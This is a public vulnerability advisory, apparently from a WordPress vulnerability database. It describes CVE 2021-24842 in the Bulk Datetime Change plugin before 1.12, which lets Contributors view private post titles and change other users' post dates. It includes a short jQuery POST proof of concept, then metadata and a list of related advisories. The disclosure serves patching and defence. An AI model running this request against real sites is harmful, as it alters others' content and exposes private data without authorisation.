Bulk Datetime Change < 1.12 – Missing Authorisation | CVE 2021-24842 | Plugin Vulnerabilities

Description

The plugin does not enforce capability checks which allows users with Contributor roles to 1) list private post titles of other users and 2) change the posted date of other users' posts.

Proof of Concept

Run on "Bulk Datetime Change" page:

jQuery.post("https://example.com/wp-admin/admin.php?page=bulkdatetimechange",{
  bulk_datetime_change_update: jQuery("#bulk_datetime_change_update").attr("value"),
  "bulk_date_check[]": "509",
  "bulk_date_update[509]": "2021-09-23+12:11:40",
  "bulk-datetime-change-update1": "1"
})

Affects Plugins

bulk-datetime-change

Fixed in 1.12

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2618982

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

054bd981-dbdd-47dd-bad0-fa327e5860a2

Timeline

Publicly Published

2021-10-26 (about 2 years ago)

Added

2021-10-26 (about 2 years ago)

Last Updated

2022-04-08 (about 2 years ago)

Other

Published

Title

Published

2021-08-26

Title

Woffice < 4.0.2 - Unauthenticated Disclosure of Notification Titles

Published

2024-01-24

Title

Views for WPForms < 3.2.3 - Cross-Site Request Forgery via create_view

Published

2021-01-12

Title

WP Quick FrontEnd Editor <= 5.5 - Authenticated Settings Change leading to Stored XSS

Published

2022-02-22

Title

Advanced Contact form 7 DB < 1.8.7 - Subscriber+ Arbitrary File Deletion

Published

2022-03-28

Title

Shopping Cart & eCommerce Store < 5.2.5 - Arbitrary Design Settings Update via CSRF